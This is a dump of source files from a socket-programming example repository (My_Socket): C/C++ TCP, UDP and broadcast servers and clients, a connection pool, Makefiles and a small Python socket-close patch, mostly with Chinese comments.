server_address.sin_family = AF_INET;\t\t\t// 指代协议族, IPv4\n server_address.sin_addr.s_addr = INADDR_ANY;\t// 用于多 IP 机器上(多网卡), 自动填入本机地址, 值为 0(会由内核自由选择分配IP)\n //server_address.sin_port = 0;\t\t\t\t\t// 0 表示系统随机选择一个未被占用的端口号\n server_address.sin_port = htons(PORT);\t\t\t// 将主机的无符号短整形数转换成网络字节顺序, host to net short int 16位\n\t// 网络端一般是大端,大端高字节在地址低位,低字节在地址高位\n\tprintf(\"%X\\n\", 12000);\t\t\t// 2EE0 小端\n\tprintf(\"%X\\n\", htons(12000));\t// E02E 大端\n\t// htonl(): 把32位值从主机字节序转换成网络字节序\n\t// htons(): 把16位值从主机字节序转换成网络字节序\n\t// ntohl(): 把32位值从网络字节序转换成主机字节序\n\t// ntohs(): 把16位值从网络字节序转换成主机字节序\n\n // 建立服务器端 socket (TCP)\n if ((server_sockfd = Socket(AF_INET, SOCK_STREAM, 0)) < 0) {\n perror(\"server_sockfd creation failed\");\n exit(EXIT_FAILURE);\n }\n\n // 将套接字绑定到服务器的网络地址上(IP:Port) bind,0:成功, <0:失败\n if ((bind(server_sockfd, (struct sockaddr *)&server_address, sizeof(struct sockaddr))) < 0) {\n perror(\"server socket bind failed\");\n exit(EXIT_FAILURE);\n }\n\n // 建立监听队列, 设置对大连接数量为 5(大多数系统默认缺省值为 20)\n // listen 使得 socket 处于被动的监听模式,并为 socket 建立一个输入数据队列,将到达的服务请求保存在次队列中,直到程序处理他们\n listen(server_sockfd, 5);\n\n // 死循环,同 while(1) {}\n\tfor (; ; ) {\n\t\t// 等待客户端连接请求到达(阻塞)\n\t\t// 同一时间 Server 只能处理一个 Client 请求:在使用当前连接的 socket 和 client 进行交互的时候,不能够 accept 新的连接请求。\n\t\tprintf(\"Start accept client.\\n\");\n\t\t// listening socket, connected socket\n\t\t// 让服务器接收客户端的连接请求。\n\t\tclient_sockfd = accept(server_sockfd, (struct sockaddr *)&client_address, (socklen_t *)&sin_size);\n\t\tif (client_sockfd < 0) {\n\t\t\tperror(\"accept client socket failed\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\tprintf(\"accept done.\\n\");\n\t\t// inet_ntoa, 将网络地址转换成“.”点隔的字符串格式。\n\t\tprintf(\"Client port: %d\\n\", client_address.sin_port);\t\t\t\t// 客户端端口号\n\t\tprintf(\"Client IP : %s\\n\", inet_ntoa(client_address.sin_addr));\t// 客户端 IP 地址\n\n\t\tint ret = 0;\n\t\t// 接收客户端数据\n\t\t// int recv(int sockfd, void *buf, int len, int flags)\n\t\t/*if ((ret = recv(client_sockfd, buf, BUFFER_SIZE, 0)) < 0) {*/\n\t\tif ((ret = read(client_sockfd, buf, BUFFER_SIZE)) < 0) {\n\t\t\tperror(\"recv client data failed\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\tprintf(\"ret: %d, strlen(buf): %tu\\n\", ret, strlen(buf));\n\n\t\tprintf(\"receive from client:%s\\n\",buf);\n\t\t// 发送数据到客户端\n\t\t/*if ((ret = send(client_sockfd, buf, strlen(buf), 0)) < 0) {*/\n\t\t// 这里如果使用 BUFFER_SIZE, 会发送多余的数据\n\t\tif ((ret = write(client_sockfd, buf, strlen(buf))) < 0) {\n\t\t\tperror(\"server send failed\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\n\t\tprintf(\"Len: %d\\n\", ret);\n\t\tclose(client_sockfd);\t\t\t\t// 关闭连接\n\t\t//shutdown(int sockfd, int how);\t// how 为 shutdown 操作的方式\n\t\t// how: 0:不允许继续接收数据,1:不允许继续发送数据,2:不允许继续发送和发送数据,均不允许则调用 close()\n\t}\n close(server_sockfd);\n\n exit(EXIT_SUCCESS);\n}\n"
},
{
"alpha_fraction": 0.5787139534950256,
"alphanum_fraction": 0.6008869409561157,
"avg_line_length": 18.60869598388672,
"blob_id": "0eed09fbfa7cc7119021d501d7bf8679f85c90f2",
"content_id": "8ffe0fc56b1d6f49ff5e827e9bc669c1ea9e9026",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 46,
"path": "/connect_pool/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <iostream>\n#include \"connecttionPool.h\"\n\nclass TObject {\npublic:\n\tTObject(void) {\n\t\t++uid_;\n\t}\n\t~TObject(void) {}\n\tvoid release(void) {\n\t\tprintf(\"release()\\n\");\n\t}\n\tlong long getUID(void) const {\n\t\treturn uid_;\n\t}\n\nprivate:\n\tstatic long long uid_;\n};\n\nlong long TObject::uid_ = 0;\n\nint main(int, char**) {\n\tConnectionPool<TObject> *objPool;\n\tobjPool = new ConnectionPool<TObject>(2);\n\tTObject *pobj1 = objPool->alloc();\n\tif (pobj1) {\n\t\tstd::cout << \"1. \" << pobj1->getUID() << std::endl;\n\t}\n\tTObject *pobj2 = objPool->alloc();\n\tif (pobj2) {\n\t\tstd::cout << \"2. \" << pobj2->getUID() << std::endl;\n\t}\n\tTObject *pobj3 = objPool->alloc();\n\tif (pobj3) {\n\t\tstd::cout << \"3. \" << pobj3->getUID() << std::endl;\n\t}\n\tobjPool->recycle(pobj2);\n\tpobj3 = objPool->alloc();\n\tif (pobj3) {\n\t\tstd::cout << \"3.1. \" << pobj3->getUID() << std::endl;\n\t}\n\texit(EXIT_SUCCESS);\n}\n"
},
{
"alpha_fraction": 0.5875576138496399,
"alphanum_fraction": 0.6059907674789429,
"avg_line_length": 24.52941131591797,
"blob_id": "ca9235e8f81ffc707ac9a8f9cb0591ce42e4b1b3",
"content_id": "630176e639a0971eb68e9e5e2fa9255d1de5902c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 434,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 17,
"path": "/socket_example/Makefile",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "EXEC = test\nSOURCES = $(wildcard *.c)\nHEADERS = $(wildcard *.h*)\nOBJECTS = $(SOURCES:.c=.o)\nFLAG = -Wall \n\nall: $(EXEC)\n\n$(EXEC): $(OBJECTS) $(HEADERS)\n\t$(CC) $(FLAG) -L/usr/local/Cellar/boost/1.54.0/lib -lpthread -lboost_system -lboost_filesystem-mt -lboost_thread-mt $(OBJECTS) -o $(EXEC)\n \n%.o: %.c $(HEADERS) \n\t$(CC) $(FLAG) -I/usr/local/Cellar/boost/1.54.0/include -c $< -o $@\n\n.PHONY: clean\nclean:\n\t$(RM) $(EXEC) $(OBJECTS) *.o\n"
},
{
"alpha_fraction": 0.444029837846756,
"alphanum_fraction": 0.45895522832870483,
"avg_line_length": 13.88888931274414,
"blob_id": "5046abc445eddda91d58d12f5eb9801200ffb8d3",
"content_id": "612e6b20cf0949856b0ea322c88515b4b360aa94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 268,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 18,
"path": "/connect_pool/Makefile",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "SRC += $(wildcard *.cpp)\\\n\t$(wildcard base/*.cpp) \nEXC := test\nOBJ := $(SRC:.cpp=.o)\nCXX := g++-4.7\nFLAG := -std=c++11 -Wall -g\n\nall: $(EXC)\n\n$(EXC): $(OBJ)\n\t$(CXX) $(FLAG) $? -o $@\n\n%.o:%.cpp \n\t$(CXX) $(FLAG) -c $< -o $@\n\n.PHONY: clean\nclean: $(EXC) $(OBJ)\n\t$(RM) $?\n"
},
{
"alpha_fraction": 0.5684803128242493,
"alphanum_fraction": 0.5703564882278442,
"avg_line_length": 22.173913955688477,
"blob_id": "a6a4ef760839052d897229a15437a57d4aa5d788",
"content_id": "b3d5c540c0f44b2e686e08d4cd29d6578c017f49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 533,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 23,
"path": "/broken_pipe/test.py",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#coding=utf-8\n\nimport socket\n\ndef hack_fileobject_close():\n if getattr(socket._fileobject.close, '__hacked__', None):\n print 'return'\n return\n\n old_close = socket._fileobject.close\n\n def new_close(self, *p, **kw):\n try:\n return old_close(self, *p, **kw)\n except Exception, e:\n print \"ignore %s.\" % str(e)\n new_close.__hacked__ = True\n socket._fileobject.close = new_close\n\nif __name__ == '__main__':\n hack_fileobject_close()\n print 'Done.'\n"
},
{
"alpha_fraction": 0.6323046684265137,
"alphanum_fraction": 0.6460932493209839,
"avg_line_length": 22.07575798034668,
"blob_id": "04aa267fca179bb60e75909cc474ab849880acbc",
"content_id": "ad4a169b424e54340cb1950163bd481382e3620e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1523,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 66,
"path": "/UDP_broadcast/broadcast_server/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/socket.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include <netdb.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <string.h>\n\n#define PORT 6000\n\nint main(int, char**) {\n\tsetvbuf(stdout, NULL, _IONBF, 0);\n\tfflush(stdout);\n\n\t// bind the address\n\tstruct sockaddr_in addrto;\n\tbzero(&addrto, sizeof(struct sockaddr_in));\n\taddrto.sin_family = AF_INET;\n\taddrto.sin_addr.s_addr = htonl(INADDR_ANY);\n\taddrto.sin_port = htons(PORT);\n\n\t// broadcast address\n\tstruct sockaddr_in from;\n\tbzero(&from, sizeof(struct sockaddr_in));\n\tfrom.sin_family = AF_INET;\n\tfrom.sin_addr.s_addr = htonl(INADDR_ANY);\n\tfrom.sin_port = htons(PORT);\n\n\tint sockfd = -1;\n\tif ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {\n\t\tfprintf(stderr, \"socket error\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tconst int opt = -1;\n\t// set the socket type brocast\n\tint nb = 0;\n\tnb = setsockopt(sockfd, SOL_SOCKET, SO_BROADCAST, (char*)&opt, sizeof(opt));\n\tif (nb == -1) {\n\t\tfprintf(stderr, \"set socket error\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (bind(sockfd, (struct sockaddr *)(&addrto), sizeof(struct sockaddr))) {\n\t\tfprintf(stderr, \"bind error\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tunsigned int len = sizeof(struct sockaddr_in);\n\tchar msg[100] = {0};\n\n\tfor (;;) {\n\t\t// recv msg from brocast addr\n\t\tint ret = recvfrom(sockfd, msg, 100, 0, (struct sockaddr*)(&from), (socklen_t*)(&len));\n\t\tif (ret <= 0) {\n\t\t\tfprintf(stderr, \"read error\\n\");\n\t\t} else {\n\t\t\tprintf(\"%s\\n\", msg);\n\t\t}\n\t\tsleep(1);\n\t}\n\n\texit(EXIT_SUCCESS);\n}\n"
},
{
"alpha_fraction": 0.5801724195480347,
"alphanum_fraction": 0.6586207151412964,
"avg_line_length": 27.292682647705078,
"blob_id": "149101b2eaad04dade0069cb3c38b62bfc3965c3",
"content_id": "b4486891d53fd7032ce9804057258e178839d8c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1428,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 41,
"path": "/boost_ip2socket/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "/**\n * @file main.cpp\n * @Synopsis 获取多个节点IP, 比如google 就有好几个ip.\n *\t\tURL: http://blog.csdn.net/huang_xw/article/details/8502895\n *\t\toutput:\n *\t\t[2404:6800:4005:c00::68]:80\n *\t\t173.194.127.83:80\n *\t\t173.194.127.80:80\n *\t\t173.194.127.84:80\n *\t\t173.194.127.81:80\n *\t\t173.194.127.82:80\n * @author Saki Shum, [email protected]\n * @version 0.0.1\n * @date 2014-05-22\n */\n#include <cstdio>\n#include <cstdlib>\n#include <iostream>\n#include <boost/asio.hpp>\n\nint main(void) {\n\t// 定义IO 服务对象\n\t// io_service 就是boost::asio 基于OS的I/O引擎, 其他的功能是建立在它之上的 。\n\tboost::asio::io_service my_io_service ;\n\t// 定义解析对象\n\t// resolver 接管了 DNS, 将开发者的查询(query) 转换为endpoint ( IP:Port) 地址。\n\tboost::asio::ip::tcp::resolver resolver(my_io_service);\n\t// 查询socket的相应信息\n\t// query 保存用户查询, 可以使主机名+服务命, 可以是单独的服务名, 可以是单独的主机名...\n\tboost::asio::ip::tcp::resolver::query query(\"www.baidu.com\", \"http\");\n\t// 进行域名或者服务解释,以便生成SOCKET内部使用的数据格式\n\tboost::asio::ip::tcp::resolver::iterator iter = resolver.resolve(query);\n\tboost::asio::ip::tcp::resolver::iterator end; // End marker.\n\n\twhile (iter != end) {\n\t\tboost::asio::ip::tcp::endpoint endpoint = *iter++;\n\t\tstd::cout << \"Endpoint: \" << endpoint << std::endl;\n\t}\t\n\n\treturn EXIT_SUCCESS;\n}\n"
},
{
"alpha_fraction": 0.6396344900131226,
"alphanum_fraction": 0.6561964750289917,
"avg_line_length": 22.33333396911621,
"blob_id": "e12a7b482b1589a18e6338b650c3e91b5e5bea94",
"content_id": "72788ae73fb91282069f451d9256ba3452c78250",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1925,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 75,
"path": "/UDP_client/mian.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "/**\n * @file mian.cpp\n * @Synopsis UDP Client example. (单播)\n *\t\tUsage: ./test localhost \n * @author Saki Shum, [email protected]\n * @version 0.0.1\n * @date 2015-11-20\n */\n#include <stdio.h>\n#include <stdlib.h>\n#include <iostream>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <errno.h>\n#include <string.h>\n#include <arpa/inet.h>\t// sockaddr_in\n#include <netdb.h>\t\t// gethostbyname\n#include <unistd.h>\t\t// close\n\n#define SERVER_PORT 8888\n#define MAX_BUF_SIZE 1024\n\n// 如果使用了 connect 就可以使用 send, recv 而不是使用 sendto, recvfrom 接口, 但还是还是利用传输层的UDP协议\n\nvoid udps_requ(int sockfd, const struct sockaddr_in *addr, int len) {\n\tchar buffer[MAX_BUF_SIZE];\n\tint size = 0;\n\twhile (1) {\n\t\tprintf(\"Please input char:\\n\");\n\t\tfgets(buffer, MAX_BUF_SIZE+1, stdin);\n\t\t// 阻塞\n\t\tsize = sendto(sockfd, buffer, strlen(buffer), 0, (struct sockaddr*)addr, len);\n\t\tif (size < 0) {\n\t\t\tfprintf(stderr, \"\\n\\rsend error.\\r\\n\");\n\t\t}\n\t\tbzero(buffer, MAX_BUF_SIZE);\n\t}\n}\n\nint main(int argc, char *argv[]) {\n\tint sockfd;\n\tstruct sockaddr_in addr;\n\tstruct hostent *host;\n\tif (argc != 2) {\n\t\tfprintf(stderr, \"Usage:%s server_ip\\n\", argv[0]);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\t// 返回对应于给定主机名的包含主机名字和地址信息的hostent结构指针。\n\t// 返回:非空指针——成功,空指针——出错,同时设置 h_errno\n\tif ((host = gethostbyname(argv[1])) == NULL) {\n\t\tfprintf(stderr, \"Gethostname error.\\n\");\n\t\therror(\"gethostbyname\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\t// socket\n\tsockfd = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (socket < 0) {\n\t\tfprintf(stderr, \"Socket Error.\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\t// IP:PORT\n\tbzero(&addr, sizeof(struct sockaddr_in));\n\taddr.sin_family = AF_INET;\n\taddr.sin_port = htons(SERVER_PORT);\n\taddr.sin_addr = *((struct in_addr*)host->h_addr);\n\n\tudps_requ(sockfd, &addr, sizeof(struct sockaddr_in));\n\n\tclose(sockfd);\n\n\texit(EXIT_SUCCESS);\n}\n\n"
},
{
"alpha_fraction": 0.6329987645149231,
"alphanum_fraction": 0.6499372720718384,
"avg_line_length": 22.426469802856445,
"blob_id": "aeb6facd1757121d4594c8237db8f275fd6804e6",
"content_id": "00d51314b8d9307ea5dc979aaf6d37cbb59ec7cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1696,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 68,
"path": "/UDP_example/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "/**\n * @file main.cpp\n * @Synopsis UDP Server example.(单播)\n * @author Saki Shum, [email protected]\n * @version 0.0.1\n * @date 2015-11-20\n */\n\n#include <cstdio>\n#include <cstdlib>\n#include <string.h>\t\t\t// strlen\n#include <sys/types.h>\t\t\n#include <sys/socket.h>\t\t// socket\n#include <errno.h>\t\t\t// strerror\n#include <unistd.h>\t\t\t// close\n#include <arpa/inet.h>\t\t// sockaddr_in\n\n#define SERVER_PORT 12000\n#define MAX_MSG_SIZE 1024\n\n// 如果使用了 connect 就可以使用 send, recv 而不是使用 sendto, recvfrom 接口, 但还是还是利用传输层的UDP协议\n\nvoid udps_respon(int sockfd) {\n\tstruct sockaddr_in addr;\n\tint n;\n\tsocklen_t addrlen;\n\tchar msg[MAX_MSG_SIZE];\n\twhile (1) {\n\t\tbzero(msg, sizeof(msg));\n\t\taddrlen = sizeof(sockaddr);\n\t\t// ssize_t recvfrom(int, void*, size_t, int, sockaddr*, socklen_t*)\n\t\t// 阻塞\n\t\tn = recvfrom(sockfd, static_cast<void*>(msg), MAX_MSG_SIZE, 0, (struct sockaddr*)&addr, &addrlen);\n\t\tmsg[n] = '\\0';\n\t\tfprintf(stdout, \"Server have recvived: %s\", msg);\n\t}\n}\n\nint main(void) {\n\tint sockfd;\n\tstruct sockaddr_in addr;\n\t// Socket\n\t// AF_INET\t IPv4\n\t// SOCK_DGRAM UDP\n\tsockfd = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sockfd < 0) {\n\t\tperror(\"Socket Error.\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\t// IP:Port\n\tbzero(&addr, sizeof(struct sockaddr_in));\n\taddr.sin_family = AF_INET;\n\taddr.sin_addr.s_addr = htonl(INADDR_ANY);\t// 设置本地主机 IP 地址\n\taddr.sin_port = htons(SERVER_PORT);\t\t\t// 设置端口号\n\n\t// bind\n\t// sockaddr_in ==转==> sockaddr\n\tif (bind(sockfd, reinterpret_cast<struct sockaddr*>(&addr), sizeof(struct sockaddr)) < 0) {\n\t\tperror(\"Bind Error.\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tudps_respon(sockfd);\n\tclose(sockfd);\n\n\treturn EXIT_SUCCESS;\n}\n\n"
},
{
"alpha_fraction": 0.5731707215309143,
"alphanum_fraction": 0.5853658318519592,
"avg_line_length": 12.666666984558105,
"blob_id": "9273234b3039e30e53ded1c7600a62b1e59f37c0",
"content_id": "aca3ba5db5f1990a2cb9881b272b86b5e014fa09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 6,
"path": "/socket_test/Makefile",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "all: main.c\n\t$(CC) -o test $? -O2 -Wall -Werror\n\n. PHONY : clean\nclean:\n\t-rm test\n"
},
{
"alpha_fraction": 0.6260408759117126,
"alphanum_fraction": 0.6373959183692932,
"avg_line_length": 16.83783721923828,
"blob_id": "d3e8f7fdca48bd011e3d835d32a1e376c1e32c65",
"content_id": "9ca6e057711c3c68e07aff7021428edf38a69a8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1365,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 74,
"path": "/connect_pool/connecttionPool.h",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "/**\n * @file connecttionPool.h\n * @Synopsis 用来分配连接对象的,这样不会有内存泄漏的问题\n * @author Saki Shum, [email protected]\n * @version 0.0.1\n * @date 2015-11-02\n */\n\n#pragma once \n\n#include <stdio.h>\n#include <deque>\n#include <set>\n\ntemplate<typename DataType>\nclass ConnectionPool {\npublic:\n\tConnectionPool(int max_size) \n\t: max_size_(max_size), aliveCount_(0), deadCount_(0) {\n\t}\n\n\t~ConnectionPool(void) { }\n\n\tDataType *alloc(void) {\n\t\tDataType *obj = NULL;\n\t\tif (deadCount_ > 0) {\n\t\t\tobj = deadObjs_.front();\n\t\t\tdeadObjs_.pop_front();\n\t\t\t--deadCount_;\n\t\t} else {\n\t\t\tif (max_size_ >= 0 && getCount() >= max_size_) {\n\t\t\t\tprintf(\"overflow.\\n\");\n\t\t\t\treturn NULL;\n\t\t\t}\n\t\t\tobj = new DataType();\n\t\t}\n\t\taliveObjs_.insert(obj);\n\t\t++aliveCount_;\n\n\t\treturn obj;\n\t}\n\n\tvoid recycle(DataType *obj) {\n\t\tobj->release();\n\t\taliveObjs_.erase(obj);\n\t\t--aliveCount_;\n\t\tdeadObjs_.push_back(obj);\n\t\t++deadCount_;\n\t}\n\n\tint getCount(void) const {\n\t\treturn aliveCount_ + deadCount_;\n\t}\n\tint getMaxSize(void) const {\n\t\treturn max_size_;\n\t}\n\tint getAliveCount(void) const {\n\t\treturn aliveCount_;\n\t}\n\tint getDeadCount(void) const {\n\t\treturn deadCount_;\n\t}\n\tstd::set<DataType*> &getAliveObjs(void) {\n\t\treturn aliveObjs_;\n\t}\n\nprivate:\n\tint max_size_;\n\tint aliveCount_;\n\tint deadCount_;\n\n\tstd::deque<DataType*> deadObjs_;\n\tstd::set<DataType*> aliveObjs_;\n}; // ConnectionPool\n\n"
},
{
"alpha_fraction": 0.6702380776405334,
"alphanum_fraction": 0.6916666626930237,
"avg_line_length": 25.25,
"blob_id": "c55ecb2b267c239ab44871eaa9c8cdda1c377dc4",
"content_id": "5ecd6069732258139fa8ebc151bc74857c3261d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 952,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 32,
"path": "/socket_error/client/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#include <cstdio>\n#include <cstdlib>\n#include <cstring>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <netinet/in.h>\n\nint main(void) {\n\tstruct sockaddr_in serverAddr;\n\tbzero(&serverAddr, sizeof(serverAddr));\n\tserverAddr.sin_family = AF_INET;\n\tserverAddr.sin_port = htons(1234);\n\t//serverAddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\tserverAddr.sin_addr.s_addr = INADDR_ANY; // 服务器IP地址--允许连接到所有本地地址上\n\n\tint connfd = socket(AF_INET, SOCK_STREAM, 0);\n\n\t// 建立与 TCP 服务器的连接\n\t// 第 2,3 个参数分别是一个指向套接字地质结构的指针和该结构的大小。 \n\tint connResult = connect(connfd, (struct sockaddr*)&serverAddr, sizeof(serverAddr));\n\tif (connResult < 0) {\n\t\t// Connection refused\t61\n\t\t// Operation timed out\t60\n\t\tperror(\"Connect fail.\\n\");\n\t\tclose(connfd);\n\t} else {\n\t\tprintf(\"Connect success.\\n\");\n\t}\n\tclose(connfd);\n\texit(EXIT_SUCCESS);\n}\n"
},
{
"alpha_fraction": 0.6972428560256958,
"alphanum_fraction": 0.707317054271698,
"avg_line_length": 27.984615325927734,
"blob_id": "3be7794a2804d0628d11e008dc16579852ed2bc8",
"content_id": "208595951096246d6407d45312e4c8577e1ed672",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2648,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 65,
"path": "/socket_error/server.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#include <cstdio>\n#include <cstdlib>\n#include <cstring>\n#include <cstdint>\n#include <unistd.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\t\t// sockaddr_in\n\nauto main(int, char**) -> int32_t {\n\tstruct sockaddr_in serverAddr;\n\t//struct sockaddr_in clientAddr;\n\n\tbzero(&serverAddr, sizeof(serverAddr));\n\tserverAddr.sin_family = AF_INET;\n\tserverAddr.sin_port = htons(1234);\n\n\t// htonl: convert values between host and network byte order(字节序)\n\tserverAddr.sin_addr.s_addr = htonl(INADDR_ANY); /* whilcared 通配地址*/ \n\tprintf(\"INADDR_ANY = %d\\n\", INADDR_ANY);\t\t// INADDR_ANY = 0\n\n\t//bzero(&clientAddr, sizeof(clientAddr));\n\t//socklen_t clientAddrLen = 0;\n\n\tint listenfd = socket(AF_INET, SOCK_STREAM, 0);\n\tint yes = 1;\n\tsetsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, (void*)&yes, sizeof(yes));\n\n\tif (listenfd < 0) {\n\t\tperror(\"Create socket fail.\\n\");\n\t\tclose(listenfd);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint bindResult = bind(listenfd, (struct sockaddr*)&serverAddr, sizeof(serverAddr));\n\tif (bindResult < 0) {\n\t\tclose(listenfd);\n\t\tperror(\"Bind socket port fail.\\n\");\n\t\texit(EXIT_FAILURE);\n\t} else {\n\t\tprintf(\"Bind socket port success.\\n\");\n\t}\n\n\t// listen 仅供 TCP 服务器调用,它做两件事:\n\t// 1) 当 socket 函数创建一个套接字时,他被假设为一个主动套接字,也就是说,\n\t// 他是一个将调用 connect 发起连接的客户套接字。listen 函数把一个未连接的\n\t// 套接字转换成一个被动套接字,指示内核应接受指向该套接字的连接请求;\n\t// 2) 函数的第二个参数规定了内核应该为相应套接字排队的最大连接个数。\n\t// listen(listenfd, 20);\t// client will connect success\n\t\n\t// 服务器并没有调用 accept,这是因为调用 listen 方法之后,内核为任何一个\n\t// 给定的监听套接字维护两个队列:未完成连接队列和已完成连接队列;当客户端\n\t// SYN 到达时,如果队列是满的,TCP 就忽略该分节,但不会发送 RST(重建连接);\n\t// 当进程调用 accept 时,已完成队列的队顶项将返回给进程,如果队列为空,则\n\t// 阻塞(套接字)默认为阻塞。\n\t//\t\t未完成连接队列(incomplete connection queue):\n\t//\t\t已完成连接队列(complete connection queue):\n\t// 也就说,只要调用了 listen 方法后,服务器端就打开了三次握手的开关,能够\n\t// 处理来自客户端的 SYN 分节了,只要三次握手完成,客户端就会 connect 成功,\n\t// 而跟服务器调不调用 accept 没有任何关系,accept 只是去取已完成连接队列\n\t// 的队顶项。\n\tsleep(60*5);\n\n\texit(EXIT_SUCCESS);\n}\n\n\n"
},
{
"alpha_fraction": 0.6194225549697876,
"alphanum_fraction": 0.6316710114479065,
"avg_line_length": 21.41176414489746,
"blob_id": "1b3acef424be28461fcc387c07ef320890141041",
"content_id": "1cb612b93a13fbfdb5e6fb9ef8fc268531f952ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1143,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 51,
"path": "/UDP_broadcast/broadcast_client/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <netdb.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <string.h>\n\n#define PORT 6000\n\nint main(int, char**) {\n\tsetvbuf(stdout, NULL, _IONBF, 0);\n\tfflush(stdout);\n\n\tint sockfd = -1;\n\tif ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {\n\t\tfprintf(stderr, \"socket error.\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tconst int opt = -1;\n\t// set socket type broadcast \n\tint nb = 0;\n\tnb = setsockopt(sockfd, SOL_SOCKET, SO_BROADCAST, (char*)&opt, sizeof(int));\n\tif (nb == -1) {\n\t\tfprintf(stderr, \"set socket error.\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tstruct sockaddr_in addrto;\n\tbzero(&addrto, sizeof(sockaddr_in));\n\taddrto.sin_family = AF_INET;\n\taddrto.sin_addr.s_addr = htonl(INADDR_BROADCAST);\n\taddrto.sin_port = htons(PORT);\n\tint nlen = sizeof(sockaddr_in);\n\t\n\tfor (;;) {\n\t\tsleep(1);\n\t\t// send msg to brocast addr\n\t\tchar msg[] = {\"abcdefg\"};\n\t\tint ret = sendto(sockfd, msg, strlen(msg), 0, (sockaddr*)(&addrto), nlen);\n\t\tif (ret < 0) {\n\t\t\tfprintf(stderr, \"send error.\\n\");\n\t\t} else {\n\t\t\tprintf(\"ok\\n\");\n\t\t}\n\t}\n\texit(EXIT_SUCCESS);\n}\n"
}
] | 15 |
owlvey/owlvey_sre | https://github.com/owlvey/owlvey_sre | 6e7325822dedd967f402589d12e5bfc5daab31db | 2323f38bc673ce192e97634f968333d4fa956e26 | f952a49e7912732ba6ca46db206390d836932b50 | refs/heads/master | 2023-06-12T14:58:37.972350 | 2019-08-02T00:17:28 | 2019-08-02T00:17:28 | 197,699,516 | 0 | 0 | Apache-2.0 | 2019-07-19T04:04:06 | 2019-08-02T00:17:36 | 2023-05-22T22:16:49 | HTML | [
{
"alpha_fraction": 0.6475155353546143,
"alphanum_fraction": 0.6770186424255371,
"avg_line_length": 28.227272033691406,
